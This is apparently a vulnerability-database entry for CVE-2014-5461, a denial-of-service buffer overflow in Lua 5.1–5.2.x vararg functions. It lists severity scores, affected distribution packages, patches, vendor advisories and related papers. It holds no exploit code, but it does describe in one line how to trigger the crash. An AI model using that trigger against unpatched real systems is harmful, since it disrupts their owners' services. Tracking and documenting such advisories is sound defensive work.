CVE-2014-5461Improper Restriction of Operations within the Bounds of a Memory Buffer in Lua5.1

CWE-119Improper Restriction of Operations within the Bounds of a Memory Buffer9 documents8 sources
Severity
5.0MEDIUMNVD
EPSS
21.6%
top 4.26%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
7
Debian Lua5.1Debian Lua5.2Canonical Ubuntu Linux+4 more
Timeline
PublishedSep 4
Latest updateDec 29

Description

Buffer overflow in the vararg functions in ldo.c in Lua 5.1 through 5.2.x before 5.2.3 allows context-dependent attackers to cause a denial of service (crash) via a small number of arguments to a function with a large number of fixed arguments.

CVSS vector

AV:N/AC:L/C:N/I:N/A:PExploitability: 10.0 | Impact: 2.9

Affected Packages5 packages

debiandebian/lua5.1< lua5.1 5.1.5-7 (bookworm)
debiandebian/lua5.2< lua5.1 5.1.5-7 (bookworm)
NVDlua/lua9 versions+8
NVDmageia/mageia3.0, 4.0+1
NVDopensuse/opensuse12.3, 13.1+1

Also affects: Debian Linux 7.0, Ubuntu Linux 12.04, 14.04

Patches

Patch: www.lua.orgPatch: www.openwall.comPatch: www.openwall.com

🔴Vulnerability Details

2
GHSA
GHSA-v3hh-4h88-w4mr: Buffer overflow in the vararg functions in ldo2022-05-14
OSV
CVE-2014-5461: Buffer overflow in the vararg functions in ldo2014-09-04

📋Vendor Advisories

3
Ubuntu
Lua vulnerability2014-09-03
Debian
CVE-2014-5461: lua5.1 - Buffer overflow in the vararg functions in ldo.c in Lua 5.1 through 5.2.x before...2014
Red Hat
lua: overflow flaw in vararg functions2013-04-17

📄Research Papers

2
arXiv
One Bad Apple Spoils the Barrel: Understanding the Security Risks Introduced by Third-Party Components in IoT Firmware2022-12-29
arXiv
Threat Assessment in Machine Learning based Systems2022-06-30

💬Community

1
Bugzilla
CVE-2014-5461 lua: overflow flaw in vararg functions2014-08-21